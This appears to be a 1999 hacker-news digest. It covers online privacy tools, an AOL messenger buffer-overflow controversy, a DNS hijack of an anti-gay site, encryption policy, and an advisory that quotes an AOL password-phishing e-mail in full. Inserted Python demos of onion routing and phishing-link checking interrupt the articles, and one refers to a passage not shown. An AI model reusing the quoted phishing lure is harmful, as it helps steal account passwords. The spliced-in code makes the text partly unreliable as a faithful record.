Third-party protections, the approach relied upon by Freedom's predecessors, can be hacked or bought away when the company makes a new acquisition, as was the case when Double Click acquired Abacus, Hill said. Or, civil lawsuits can force ISPs to turn over their records.

Freedom gets high marks

David Sobel, general counsel for the Electronic Privacy Information Center, and Ari Schwartz, a policy analyst with the Center for Democracy and Technology, agree that Freedom is a good solution.

"I suspect that it is one of the best solutions that we've seen," Sobel said. Freedom's strength comes from Hill's philosophical commitment to preserving privacy and anonymity on the Internet, Sobel said.

Schwartz underlined the Center's stance on Internet privacy -- software solutions combined with self-regulation among service providers and legislation will be needed to protect privacy online. The U.S. Congress has introduced several bills this session relating to online privacy but advocates say they may not go far enough. A CDT report concludes that online privacy is the exception, not the rule, in the private sector.

U.S. encryption policy has its pros and cons

The U.S. policy that prohibits encryption exports and labor is based on protecting security codes produced and cracked by the FBI and other national security agencies. The downside is that we may lose out on what has turned into a $1.5 billion cryptography business for Canada, where limits are less strict, Hill says. The U.S. approach could backfire and result in a brain drain of encryption experts, EPIC's Sobel said.
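The "How it works" passage above describes layered encryption peeled off hop by hop, so that each relay learns only the next station and nobody on the path can trace a packet back to its origin. The following is an added toy model of that idea, written for this digest; it is not Zero-Knowledge's code and says nothing about the Freedom protocol itself. The relay names, keys and nonce are constructed for the demo, and the HMAC-SHA256 keystream stands in for a real cipher.

```python
import hashlib
import hmac
import json

# Constructed names and keys for the demo; a real deployment would use
# independently operated relays and negotiated per-session keys.
RELAYS = ["relay-a", "relay-b", "relay-c"]
KEYS = {name: hashlib.sha256(b"demo-key-" + name.encode()).digest() for name in RELAYS}
NONCE = b"demo-nonce-0001"  # toy: fixed here, must be fresh per packet in practice


def keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """Counter-mode keystream from HMAC-SHA256, a toy stand-in for a real cipher."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hmac.new(key, nonce + counter.to_bytes(4, "big"), hashlib.sha256).digest()
        counter += 1
    return bytes(out[:length])


def xor_crypt(key: bytes, nonce: bytes, data: bytes) -> bytes:
    """Stream-cipher XOR; the same call both encrypts and decrypts."""
    return bytes(a ^ b for a, b in zip(data, keystream(key, nonce, len(data))))


def build_onion(route, destination, message):
    """Sender wraps the message once per relay, innermost (last relay) first.
    Each layer names the node that must strip it and carries the next layer
    encrypted under that node's key, so only that node can open it."""
    inner = json.dumps({"next": destination, "data": message}).encode()
    for hop in reversed(route):
        blob = xor_crypt(KEYS[hop], NONCE, inner)
        inner = json.dumps({"hop": hop, "blob": blob.hex()}).encode()
    return inner


def peel(relay, packet):
    """A relay strips the layer addressed to it and learns only the next hop."""
    outer = json.loads(packet.decode())
    if outer["hop"] != relay:
        raise ValueError("layer is not addressed to this relay")
    inner = xor_crypt(KEYS[relay], NONCE, bytes.fromhex(outer["blob"]))
    view = json.loads(inner.decode())
    next_hop = view["hop"] if "hop" in view else view["next"]
    return next_hop, inner


def try_read(relay, packet):
    """What a relay gets if it applies its own key to a layer not meant for it:
    the bytes do not even parse, so it sees neither the route nor the message."""
    outer = json.loads(packet.decode())
    try:
        guess = xor_crypt(KEYS[relay], NONCE, bytes.fromhex(outer["blob"]))
        return json.loads(guess.decode())
    except ValueError:
        return None


def deliver(route, destination, message):
    """Walk the packet through the route, recording what each relay observed.
    Returns (observations, message as seen at the far end)."""
    packet = build_onion(route, destination, message)
    observations = []
    current = route[0]
    for _ in route:
        next_hop, packet = peel(current, packet)
        observations.append((current, next_hop))
        current = next_hop
    return observations, json.loads(packet.decode())["data"]


if __name__ == "__main__":
    seen, msg = deliver(RELAYS, "forum.example", "pro-democracy post")
    for relay, nxt in seen:
        print(f"{relay} forwarded to {nxt}")
    print("delivered:", msg)
```

Each entry in the observation list pairs a relay with the only thing it learned, its successor; the last relay sees the cleartext and the destination but not the sender, which is the property the article attributes to Freedom. The toy omits what a real design needs on top of this: per-packet nonces, integrity tags on each layer, padding so that layer sizes do not leak the route length, and cover traffic against timing correlation.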
"The end result will be that American companies will lose leadership in this field," he said, "and it is not going to result in encryption being out of the hands of anyone our government might be concerned about."

@HWA

48.0 Is AOL hacking IM users?
~~~~~~~~~~~~~~~~~~~~~~~~

Contributed by D----Y;

http://www.zdnet.com/filters/printerfriendly/0,6061,2316917-2,00.html

--------------------------------------------------------------
This story was printed from ZDNN, located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------

Is AOL hacking IM users?
By David Raikow, Sm@rt Reseller
August 18, 1999 3:04 PM PT
URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2316917,00.html

As the Instant Messaging war rages on, evidence is mounting that suggests America Online Inc. is using a security hole in its own software to lock out IM clones. While security experts are still examining IM logs to determine precisely what is going on, it looks like AOL's tactics may have put its own users at serious risk.

The first hint of a problem came last Wednesday, when an individual identifying himself as "Phil Bucking" of "Bucking Consulting" sent an e-mail to PharLap Software President Richard Smith warning of a "buffer overflow" vulnerability in the AOL IM client. Smith, a noted security expert, quickly determined that the e-mail had been falsified, and had almost certainly come from within Microsoft. Microsoft has flip-flopped on whether or not the e-mail message actually came from one of its employees.

Because of the identity question, the allegations of "Mr. Bucking" initially garnered little serious attention. On Monday, however, Robert Graham, chief technical officer with Network Ice Software, a software security firm, released a detailed analysis of the AOL IM logon procedure, which suggests a vulnerability almost identical to that described by "Bucking".

A very serious threat

The security community is now taking the threat very seriously.
"Buffer overflow" vulnerabilities allow an intruder to trick a susceptible machine into executing code by sending it more information than it is configured to receive. These attacks require a great deal of technical knowledge to develop, but are often automated with script tools and used to compromise network servers by skilled hackers and "script kiddies" alike.

While emphasizing that the evidence is still preliminary, PharLap's Smith said he believes that AOL has been using this technique to trigger specific responses from its IM clients. Because Microsoft's IM clients do not have this bug, AOL servers can identify them, and lock them out of the system. This bug has only been observed on Windows clients; it is not clear how other platforms are affected.

Smith said he sees this as a very serious potential threat to users. As Microsoft continually updates its clients, AOL must keep introducing new variations on the buffer overflow to stay ahead. "It's only a matter of time before they make a mistake, and machines running AOL IM start crashing all over the Net," Smith predicts.

Smith added that the hole gives AOL an extraordinary amount of power over users' machines. "Remember that this is a technique normally used by hackers to break into machines. The current use seems pretty benign, but AOL can use this to execute any arbitrary code on a Windows machine -- run software, leave backdoors, whatever. What happens if a disgruntled AOL employee finds a use for this?" Smith warned.

Larger potential danger

Graham said he concurs with Smith's assessment, though he sees an even larger potential danger: "If hackers managed to masquerade as an AOL server, they could do anything to the target machine. This could be a real problem for cable modem and DSL users, who have 24-hour connections and are vulnerable to 'man-in-the-middle' attacks."
Graham noted that such attacks are unlikely in the near future because of the technical expertise required, but are a very real possibility.

AOL did not respond to requests for comment on these latest charges by press time.

@HWA

49.0 Anti-gay site is hacked
~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by deepquest

In what appears to be a simple internic spoof the registration information for godhatesfags.com was changed to the owner of godlovesfags.com. It is unknown if the first domain became unregistered or if the perpetrator somehow fooled Network Solutions into changing the information. Unfortunately it does not appear that anyone who has written a 'news' article about this has any idea how the internet works, making it hard to determine exactly what happened.

Hackers reverse message on anti-gay Web site
August 19, 1999
Web posted at: 5:22 p.m. EDT (2122 GMT)
By Robin Lloyd
CNN Interactive Senior Writer

(CNN) -- Hackers switched the message from hate to love on a notorious anti-gay site on the Internet.

A 2-year-old Web site www.godhatesfags.com put up by Pastor Fred Phelps' Westboro Baptist Church in Topeka, Kansas, was hacked Wednesday to re-route visitors to www.godlovesfags.com, featuring a pink and purple pro-gay banner, links to gay news Web sites and a quote from Ellen DeGeneres.

"Hate will not be tolerated on the Internet," said Kris Haight on Thursday. Haight says he registered the domain name for the pro-gay site more than a year ago and gave the OK for the re-routing within the past two days. "Phelps teaches hate and a lot of it is untrue. People who go to their site and want to find hate aren't going to find it, at least until he gets the domain back."

The pro-gay site, usually visited daily by only a handful of people, got 8,000 hits in the past 24 hours, Haight said. The pages were written by Rich Macky of Omaha, Nebraska, Haight said.
The switch did not show up on all computers Thursday as it takes time for the re-routing to take effect on servers worldwide.

Phelps' daughter, Shirley Phelps-Roper, said the hack is just one of more than a dozen tricks played on the church's Web site in the past two years.

"No, my dear, it's not all that drastic," she told CNN Interactive. "It's just another fag ploy to try to bury the truth of God and the Earth. It's a temporary inconvenience."

Phelps-Roper, who also serves as the church's attorney, said it would take a couple days of paperwork on her end to correct the re-routing.

Fred Phelps, whose congregation regularly engages in anti-homosexual picketing, demonstrated at the funeral of Matthew Shepard, a 21-year-old gay man who was savagely beaten to death in a Wyoming hate crime.

Hacker hit DNS

Haight said he didn't know who originated the hack, which involves re-routing godhatesfags.com visitors via the Domain Name System, a network of servers which translates alphabetic domain names into numeric IP, or Internet Protocol, addresses.

Haight, a 22-year-old gay man living in Newport, New Hampshire, said he registered the pro-gay domain name a year or so ago when he found out about Phelps' site, which he says he found disgusting. He recently received an anonymous e-mail advising him to watch the Internet contact information for his site.

Wednesday, Haight got a chance to change that information. "I set up the server to point godhatesfags to godlovesfags," he said. Later, he received another e-mail saying the address swap worked.

Haight is part of a group of Internet denizens known as Mindsprung, a play on the popular Internet service provider Mindspring. Haight owns domain names for a couple other Web sites, including www.gaycollegeboys.com, an IRC chat discussion page.

Phelps-Roper said the 100-member church has been forced to switch servers a few times due to all the digital attacks on the site. The church sponsors another Web site -- godhatesamerica.com.
"We're busy people, not thwarted or detracted by one more assault on our ministry," she said. "It's like 'ho hum.'"

@HWA

50.0 Indonesian CyberWar? Or Not?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Space Rogue

On Wednesday Nobel Peace Prize laureate Jose Ramos-Horta claimed that hundreds of people around the world were poised to launch a cyber attack against Indonesia should there be any tampering in the election process for East Timor's freedom. Yesterday HNN cast grave doubts on this claim having seen absolutely no evidence to support it. Connect Ireland, the ISP that hosts the virtual top level domain of .tp for East Timor, has released a press release also saying that they have not seen nor heard of any preparations for any electronic retaliation. C-I also urges all people to leave the internet for communication and not to attack other people's freedom of speech via the internet.

San Jose Mercury News - Story on Jose Ramos-Horta's statements
http://www7.mercurycenter.com/premium/world/docs/cyberwar19.htm

HNN Archive for August 19, 1999
http://www.hackernews.com/archive/arch.html?081999#2

Press Release from Connect Ireland
http://www.hackernews.com/orig/conire.html

Press Release - from Connect - Ireland Communications Ltd.
4.30pm GMT, Thursday 19th August 1999, Dublin.

Connect-Ireland's response to the call for Cyber War against Indonesia.

In a number of recent international newspapers, articles have appeared quoting Ramos Horta in the context of the threat of the use of cyberwarfare against Indonesia. There are some points I would like to make to correct some of the content in these articles.

The attack on us - which was a culmination of attacks over 9/10 months - was NOT directed at a web site - but at the cctld - top level domain - for East Timor (.tp) - and therefore much more serious than stated.
During the course of the attack, we established that the perpetrators had a full domain registry with them and were endeavouring to establish spurious domains - which we can but assume were for nefarious purposes and presumably these would reflect badly on the Call for Freedom by the East Timorese.

Our activities and initiatives have established East Timor's virtual independence, at least as far as the Internet is concerned.

After the attack we received many positive offers of support and assistance. The offers also included possible revenge attacks against Indonesia - which we stated categorically that we did not want or condone.

We have not heard from anyone in the current call for such action by Ramos Horta either in the Irish Internet community or any other location. If we had heard of such a potential action, C-I would have endeavoured to dissuade the use of such options and activities and hopefully would have directed the interest and intellectual capacity to more fruitful channels.

I would like to make our position extremely clear. We do not condone attacks of any kind on the Internet or other similar technologies. We believe in the freedom of speech and in everyone's ability to conduct their communication for their own legitimate purposes. We (C-I) believe there is more to be gained by maintaining the opportunities that can be developed through free speech than in conducting cyberwarfare.

I would also like to add that after the attack on us, we received support from many Indonesians - who translated our statement(s) into the many languages that are used within that territory and circulated these widely.

We (C-I) are NOT at war with the Indonesian People.

We were completely unaware of the proposed activity as given by Horta. We have not been approached in recent months by anyone who has stated that they wished to participate in an activity of this nature.
The response that we received after the attack from the 'hacker' cyber community was all very anti cyber terrorism.

Since the beginning of this year, we have been informed on good authority that over 5000 East Timorese have been killed. In this light, I can perceive that leading activists in the cause for East Timor are under considerable pressure and this will continue until the implementation of full and open democratic processes are in place in East Timor.

To my mind Gandhi would have made a much better Internet strategist than Hitler.

Connect-Ireland believes in the freedom of speech. We believe that all lines of communication should always be kept open as there is more to gain through this process. I can think of no better environment for managing "Jaw-Jaw rather than War-War" - than the Internet.

Martin Maguire
Project Director
Connect-Ireland Communications Ltd.
19th August 1999

Connect-Ireland Communications Ltd., 20 Mark St., Dublin 2
Tel:+353-1-6706701 Fax:+353-1-6790089 Mob.+353-86-UCALLME
URL: http://www.connect.ie
-Internet for Everyone-

51.0 Gov Wants to Break Into Personal Computers, Legally
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by AlienPlague

A proposed 'Cyberspace Electronic Security Act' would give the DoJ additional powers to break into personal computers. The DoJ memo dated August 4 would allow the government to disable encryption on the machines and to gather passwords.

Washington Post
http://www.washingtonpost.com/wp-srv/business/daily/aug99/encryption20.htm

CNN
http://www.cnn.com/TECH/computing/9908/20/computer.codes.ap/index.html

Yahoo News
http://dailynews.yahoo.com/h/nm/19990820/ts/technology_covert_2.html

Justice Department Mulls Covert-Action Bill
By Robert O'Harrow Jr.
Washington Post Staff Writer
Friday, August 20, 1999; Page A1

The Justice Department wants to make it easier for law enforcement authorities to obtain search warrants to secretly enter suspects' homes or offices and disable security on personal computers as a prelude to a wiretap or further search, according to documents and interviews with Clinton administration officials.

In a request set to go to Capitol Hill, Justice officials will ask lawmakers to authorize covert action in response to the growing use of software programs that encrypt, or scramble, computer files, making them inaccessible to anyone who does not have a special code or "key," according to an Aug. 4 memo by the department that describes the plan.

Justice officials worry that such software "is increasingly used as a means to facilitate criminal activity, such as drug trafficking, terrorism, white-collar crime, and the distribution of child pornography," according to the memo, which has been reviewed by the Office of Management and Budget and other agencies.

Legislation drafted by the department, called the Cyberspace Electronic Security Act, would enable investigators to get a sealed warrant signed by a judge permitting them to enter private property, search through computers for passwords and install devices that override encryption programs, the Justice memo shows.

The law would expand existing search warrant powers to allow agents to penetrate personal computers for the purpose of disabling encryption. To extract information from the computer, agents would still be required to get additional authorization from a court.

The proposal is the latest twist in an intense, years-long debate between the government and computer users who want to protect their privacy by encrypting documents. Although Justice officials say their proposal is "consistent with constitutional principles," the idea has alarmed civil libertarians and members of Congress.
"They have taken the cyberspace issue and are using it as justification for invading the home," said James Dempsey, senior staff counsel at the Center for Democracy and Technology, an advocacy group in the District that tracks privacy issues.

Police rarely use covert entry to pave the way for electronic surveillance. For example, federal law enforcement agencies obtained court approval just 34 times last year under eavesdropping statutes to install microphones, according to the 1998 wiretap report issued by the Administrative Office of the United States Courts.

David L. Sobel, general counsel at the Electronic Privacy Information Center, predicted the number of secret break-ins by police would soar if the proposal is adopted because personal computers offer such a tantalizing source of evidence for investigators -- including memos, diaries, e-mail, bank records and a wealth of other data.

"Traditionally, the concept of 'black bag' jobs, or surreptitious entries, have been reserved for foreign intelligence," Sobel said. "Do we really want to alter the standard for physical entry?"

The proposal follows unsuccessful efforts by FBI Director Louis J. Freeh and other Justice officials to secure laws requiring computers or software to include "back doors" that would enable investigators to sidestep encryption. Those proposals, most notably one called Clipper Chip, have been criticized by civil libertarians and have received little support in Congress.

In a snub of the administration, more than 250 members of Congress have co-sponsored legislation that would prohibit the government from mandating "back doors" into computer systems.

"We want to help law enforcement deal with the new technologies. But we want to do it in ways that protect the privacy rights of law-abiding citizens," said Rep. Robert W. Goodlatte (R-Va.), who originally sponsored the legislation, known as the Security and Freedom Through Encryption Act.
Goodlatte said the Justice Department's proposal might upset the "very finely tuned balance" between law enforcement power and civil liberties.

But Justice Department officials say there is an increasingly urgent need for FBI agents and other federal investigators to get around encryption and other security programs.

"We've already begun to encounter [encryption's] harmful effects," said Justice spokeswoman Gretchen Michael. "What we've seen to date is just the tip of the iceberg."

The proposed law also would clarify how state and federal authorities can seek court orders to obtain software encryption "keys" that suspects might give to others for safekeeping. Although few people share such keys now, officials anticipate that they will do so more often in the future.

Administration officials played down the potential impact on civil liberties. In interviews, two officials said the law would actually bolster privacy protections by spelling out the requirements for court oversight of cyber-surveillance and the limits on how information obtained in a search could be used.

"The administration is supportive of encryption. Encryption is a way to provide privacy, but it has to be implemented in a way that's consistent with other values, such as law enforcement," said Peter P. Swire, the chief White House counselor for privacy. "In this whole debate, we have to strike the right balance."

Computer specialists predict that people under investigation will take countermeasures.

"It's 'Spy vs. Spy,' " said Lance Hoffman, director of the Cyberspace Policy Institute at George Washington University, who praised the administration for raising the issue but expressed skepticism about the proposal as it was described to him. "I'd be leery if I were the government. . . . They have to be real careful," he said.

© 1999 The Washington Post Company

-=-

CNN;

Feds want authority to secretly crack personal computer codes
August 20, 1999
Web posted at: 12:49 a.m.
EDT (0449 GMT)

WASHINGTON (AP) -- The Clinton administration reportedly plans to ask Congress to give police authority to secretly go into people's personal computers and crack their security codes.

Legislation drafted by the Justice Department would let investigators get a sealed warrant from a judge to enter private property, search through computers for passwords and override encryption programs, The Washington Post reported Friday.

The newspaper quoted an August 4 department memo that said encryption software for scrambling computer files "is increasingly used as a means to facilitate criminal activity, such as drug trafficking, terrorism, white-collar crime and the distribution of child pornography."

Under the measure, investigators would obtain sealed search warrants signed by a judge as a prelude to getting further court permission to wiretap, extract information from computers or conduct further searches.

Privacy advocates have objected to the plan, dubbed the Cyberspace Electronic Security Act by the Justice Department.

"They have taken the cyberspace issues and are using it as justification for invading the home," James Dempsey, an attorney for the Center for Democracy and Technology, told the Post.

Peter Swire, the White House's chief counselor for privacy, told the newspaper the administration supports encryption as a way to provide privacy for computer users.

"But it has to be implemented in a way that's consistent with other values, such as law enforcement," Swire said. "In this whole issue we have to strike the right balance."

The administration has for years been seeking a law to require computer makers to include a so-called Clipper Chip in their products that would give police a "back door" into computers despite any encryption software they may contain.

In a backlash, more than 250 members of Congress have signed on as co-sponsors to legislation that would prohibit mandating such back-door devices on computers.
Copyright 1999 The Associated Press. All rights reserved. 52.0 Hearings to be Held on Echelon ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond The House Government Reform and Oversight Committee will hold hearings on such surveillance programs as the National Security Agency's "Project Echelon," the NSA's global eavesdropping network. Earlier this year committee Chairman Dan Burton (R-IN) amended the FY 2000 Foreign Intelligence Authorization Act to require the DoJ, the NSA, and the CIA to submit to Congress a report detailing the legal standards the agencies use when they eavesdrop on American citizens. US House of Representatives http://www.house.gov/barr/p_081699.html 53.0 AOL Password Scam Uncovered ~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Webmaster The Shadow Knights Security Corp. has released an advisory that details a new scam that they have discovered that attempt to steal AOL users passwords. Basically an email is sent to the user which directs them to a fake AOL NetMail page where they are prompted to enter their username and password to read unread mail. The Shadow Knights Security Corp http://www.ShadowGovt.net/Texts/aolscam2.html Brief written by - - The Phantom x^\|/^x http://angelfire.com/oh3/preview/ ::mirror:: http://www.ShadowGovt.net/aolscam/ The above link is from a scam e-mail that has been sent to who knows how many AOL members. This time the setup is even more elaborate than the site our last advisory was about. Our last advisory is similar to this one however, we feel the need to reiterate our position. Why a scam works: This scam setup and procedure is similar to all most AOL password scams, however, someone spent time on this one. AOL users tend to not be familiar with the 'real' Internet. This is not saying AOL users (in general) are not as smart as other ISP users, however, AOL users do lead a sheltered internet existence. 
A built-in browser, their own chat rooms, their own 'Instant Messages', even their own AOL buddy list. AOL is a great ISP for those who are beginning net users and for those who wish to venture out, start leaving that AOL window and go out and find things on your own. Being this enclosed leaves AOL users to communicate only with other AOLers and less with the other ISP users.

Research done previously by TSK Security Corp. suggests that 86% of AOL users who received this e-mail will visit the site; 62% of AOL users who received this e-mail will give their password and logon to the site.

The setup:

AOL security breaches are more often than not attempted using our good friend Social Engineering. I received the e-mail via BCC from MAIL36@aol.com. The scam includes a subject of 'AOL NetMail 2.0' and the body contains claims of:

'We have noticed that you have not been using America Online NetMail. You currently have: [5] unread message(s)'

The body of the message also includes details that 'Many times urgent messages are sent to NetMail, due to confidentiality, or privacy.'

Upon visiting the page you see what looks like the AOL NetMail page however, on this page is an Angelfire banner. Note: Angelfire is not owned by AOL and you should never trust an internet site UNLESS it is on the relevant domain (AOL.com). Example: If you are told to visit the new Hacker News Network (hackernews.com) and the link sends you to an Angelfire or Tripod account DON'T BELIEVE THAT YOU ARE AT HackerNews.com.

These scams will only continue if ignorance seems never to subdue. Please, if you are an AOL user (like myself) never, ever, EVER give away your account information to an unauthorized source. AOL Staff will NEVER ask for your password to your Logon account. Below is the exact text of the scam e-mail (A). I have checked out the supposed links above and they look to be from a free CGI Scripting Service.
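The advisory's rule, "never trust a site unless it is on the relevant domain", can be applied mechanically to the links in a message. The following is an added example, not part of the TSK advisory: it pulls the URLs out of an e-mail body, checks each host against a trusted domain with a proper label-boundary test (so aol.com.example.net is not aol.com), and flags a message that talks about AOL but links elsewhere. The sample mail is constructed from the scam text the advisory quotes; the trusted domain list is an assumption.

```python
"""Check whether links in an e-mail really point at the domain they claim to.

Added example (not part of the TSK advisory): applies the rule "never trust
a site unless it is on the relevant domain" to every link in a message.
"""
import re
from urllib.parse import urlsplit

# Domains whose pages may legitimately ask for the account password.
# Assumed for this example; a real deployment would take them from policy.
TRUSTED_DOMAINS = {"aol.com"}

URL_RE = re.compile(r"https?://[^\s<>()\"']+", re.IGNORECASE)


def host_of(url: str) -> str:
    """Return the lowercase hostname of a URL, without port or userinfo."""
    host = urlsplit(url).hostname or ""
    return host.lower().rstrip(".")


def is_on_domain(host: str, domain: str) -> bool:
    """True if host is the domain itself or a subdomain of it.

    Compares on a label boundary, so 'aol.com.example.net' and 'notaol.com'
    are NOT treated as aol.com, while 'mail.aol.com' is.
    """
    return host == domain or host.endswith("." + domain)


def classify_links(message: str, trusted=TRUSTED_DOMAINS):
    """Return a list of (url, verdict) for every link in the message.

    verdict is 'trusted' when the host is on a trusted domain and
    'untrusted' otherwise (e.g. a free hosting account such as angelfire.com).
    """
    results = []
    for url in URL_RE.findall(message):
        url = url.rstrip(".,;)")  # trailing punctuation is not part of the link
        host = host_of(url)
        ok = any(is_on_domain(host, d) for d in trusted)
        results.append((url, "trusted" if ok else "untrusted"))
    return results


def suspicious(message: str, claimed_domain: str = "aol.com") -> bool:
    """True if the message names the domain but links somewhere else.

    This is exactly the pattern in the advisory: the mail is all about
    AOL NetMail, yet sends the reader to an angelfire.com page.
    """
    if claimed_domain.lower() not in message.lower():
        return False
    verdicts = classify_links(message, {claimed_domain})
    return any(v == "untrusted" for _, v in verdicts)


# Constructed sample, based on the scam text quoted in the advisory.
SCAM_MAIL = """Dear Member
AOL NetMail 2.0
We have noticed that you have not been using America Online NetMail.
You currently have: [5] unread message(s)
To check your E-Mail please goto: Netmail Preview (http://angelfire.com/oh3/preview/)
For more information please Email AOLNetMail@AOL.Com
"""

# Constructed sample of what a legitimate notice would look like.
LEGIT_MAIL = "Read your mail at https://mail.aol.com/ - AOL Member Services"

if __name__ == "__main__":
    for url, verdict in classify_links(SCAM_MAIL):
        print(f"{verdict:9s} {url}")
    print("scam mail suspicious:", suspicious(SCAM_MAIL))    # True
    print("legit mail suspicious:", suspicious(LEGIT_MAIL))  # False
```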
If you do receive this scam or similar scam e-mail, forward all the scam e-mails to TOSEMail1@aol.com.

Webmaster@ShadowGovt.net - TSK Security Corporation - http://www.ShadowGovt.net
KnightNews Network - http://www.HackerNews.net

(A).

"Dear Member

AOL NetMail 2.0

We have noticed that you have not been using America Online NetMail.

You currently have: [5] unread message(s)

To check your E-Mail please goto: Netmail Preview (http://angelfire.com/oh3/preview/)

Many times urgent messages are sent to NetMail, due to confidentiality, or privacy.

For more information please Email AOLNetMail@AOL.Com

Thank you
Mike Bowers
AOL NetMail 2.0
©1999 America Online"

@HWA

54.0 Bronc's Defcon VII Review
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Bronc Buster

The Synthesis has finally posted a review of Defcon VII, that was in their last print issue, onto their web site. The review is authored by someone you might know, Bronc Buster.

The Synthesis
http://www.thesynthesis.com/tech/defcon/vii.html

DefCon 7
Hackerz, Phreakerz and Fedz: Three Days of Fear and Loathing in Las Vegas
By Bronc Buster

We flew into Las Vegas on Wednesday, hoping to get to check out the hotels and casinos on the strip before it all started. How were we to know the worst floods in Las Vegas history would happen, and that we would be told to stay in our hotel rooms for our own safety? What a beginning to a long five days, and another weird kick off for another installment of DefCon.

This was DefCon 7, the annual hacker convention that happens every year in Las Vegas. Everyone comes to DefCon: Teams from Microsoft and Intel, Federal Agents, elite underground figures, a huge number of hackers and phreakers, and even high school kids who must have run away to come, because they look far too young to be in the city of sin by themselves. They come from all over the world: from Australia, Kuwait, Europe, South America, you name it.
So for those of you not familiar with DefCon, you are asking yourself what would bring all these people—well over 3000 by some estimates—to the Alexis Park Hotel for this three-day event. Well, ask each different person and you will get a different answer. DefCon had three different speaking tracks this year, ranging from newbie to advanced topics, like how to take over PBX phone systems, to a simple introduction to TCP/IP, which is the protocol the Internet uses to function the way it does.

Now, on the surface it may sound like a normal convention just like any other, but once you get there, you notice some strange things happening. There were vendors selling everything from very real-looking fake IDs to books, old computer hardware and military computer equipment, T-shirts and CDs with alternate operating systems, like FreeBSD and Linux. There was a scavenger hunt, in which the items to be collected included everything from a satellite dish off the top of a famous casino, to a menu from a local restaurant. They had "hacker death matches" in huge, inflatable sumo outfits, that paired off people who may hate each other online, but have never seen each other in real life.

Popular yearly games are played, like Hacker Jeopardy, in which teams of hackers get onstage in a game of Jeopardy to see who knows the most, with the losers having to drink large amounts of beer. The l0pht (pronounced Loft) also holds a TCP/IP drinking game, where people shoot it out on stage to see who knows the most about the complex inner-workings of the net, with the losers having to drink large amounts of beer. Another popular game that goes on throughout the entire convention is "Spot the Fed." This is where normal con goers try to pick out the feds who might be in the crowd mingling. It’s all in good fun, and if spotted, they are brought on stage, asked to show their ID, and then given a round of applause and a T-shirt saying "I am a Fed."

As the years roll by and DefCon gets larger and larger, it attracts more and more people. This was apparent in how seriously the U.S. Government is taking it, this year hosting its own panel where people could ask questions to agents from the National Security Council, the White House and the NSA. More apparent were the masses of media people who showed up. More than 300 press passes were given out, and there were over 20 film crews on hand, from CNN to Z-Net, and TV stations from all over the world. Needless to say, it is almost unbelievable seeing it go from what it was 7 years ago—when it was a gathering of a few hundred people run by a group of friends who had the wild idea to get together to have fun in Las Vegas—to what it is today.

One of this year’s highlights included a presentation from a group called the Cult of the Dead Cow, or cDc for short, who released an updated version of their remote administration tool called Back Orifice 2000 (BO2K). In addition to its legitimate use—remotely administrating networks—critics say it can also take over other people’s computers over the Internet if someone were to be duped into installing it onto their system. BO2K has the ability to take over the mouse and keyboard of a victim’s computer, and in addition to logging everything a person might type, it can provide a video feed in real time, so one can watch what the victim’s computer is doing, what is being clicked on, and what is being seen. Similar to last year’s presentation (when the group announced their original Back Orifice tool), this year the cDc made a grand entrance with strobe lights, loud techno music and spinning cow skulls on the walls. It was standing room only for their almost two-hour presentation.

Another highlight, and always a favorite, was Capture the Flag. Now, this is not the game you played when you were a kid, this is Capture the Flag, hacker-style.
People set up target boxes and put them on a network in one of the convention rooms, while other people hook up their laptops and try to break into them to plant their group’s "flag." These boxes vary in types and operating systems, and they are not your run of the mill systems, either. The owners secure them and try to make it a difficult task for people to get on. This year, a group calling itself the "Ghetto Hacker" took first prize by getting onto the most boxes and defending them from other groups who were hard at work trying to follow them.

As you can no doubt imagine, as much play as serious work goes on at this con, which is why people say that it is so popular. The parties go on long into the night, and the speakers do not start until noon or so, then fade into the games, which last until midnight or longer. The Alexis Park was kind enough to stock Jolt Cola for the con-goers to help keep them going, and the Dis.Org Crew (the DOC) brewed, and then gave away case after case of caffeinated beer to also help keep the parties going strong.

Now, you may be getting the idea that DefCon is nothing more than a three-day long party, but that’s only part of it. The convention features speakers on a variety of topics: this year, there were federal agents talking about legal matters and what the government is planning on doing for the future of the Internet; lawyers talking about rights and how they relate to the Internet; people talking about various security problems with different systems and software; investigators talking about online forensics and intruder-detection systems; reporters talking about what it is like reporting on the hacking underground, and much, much more.

In the past, DefCon was looked on as a freak show of sorts, where people with multiple body piercings and colored hair were the norm. Now, as it grows, it almost looks as if this year that was the exception rather than the rule. More women are showing up, as well as people from all ethnic backgrounds, and more people are in their late 20s now (like me), rather than the pale youngsters of past conventions. The only thing that has remained from the days of yore is the party attitude.

As you can imagine, not everything goes according to plan when you get over 3000 people with a lot of technical skills and a lot of beer in one place. The lights and climate controls were messed with more than once, and the radio channels the hotel security used had to be changed several times as well because their channels were being taken over by short wave radios that many people were carrying on their belts. Other classic pranks were pulled as well: soap was poured into the hotel fountain, beer bottles were left floating in the pool, and streakers ran through the con from time to time (men and women). After the first day, the hotel had to double its security, but as with most hotels that have hosted DefCon in the past, it was not ready for what came with the con. On Saturday, some poor couple got married and had their reception at the Alexis Hotel; they were surrounded by freaky con-goers and left shortly after their party arrived.

The con’s organizer, Jeff Moss (who goes by the name Dark Tangent), was strangely absent this year for most of the con. In past years, Moss was almost omnipresent, constantly up on stage with announcements and fixing problems that arise during the three-day con. In his absence, a large fellow named Priest ran the con, and run it he did, with an iron hand. He was a cross between a Nazi SS trooper and a pro wrestler, throwing people out on a whim and canceling presentations by people he didn’t like. If there was anything that could have made a fun three days turn bad, he was it. Lucky for us con-goers, Moss would pop in from time to time and defuse things, which kept the con moving with only a few bumps.

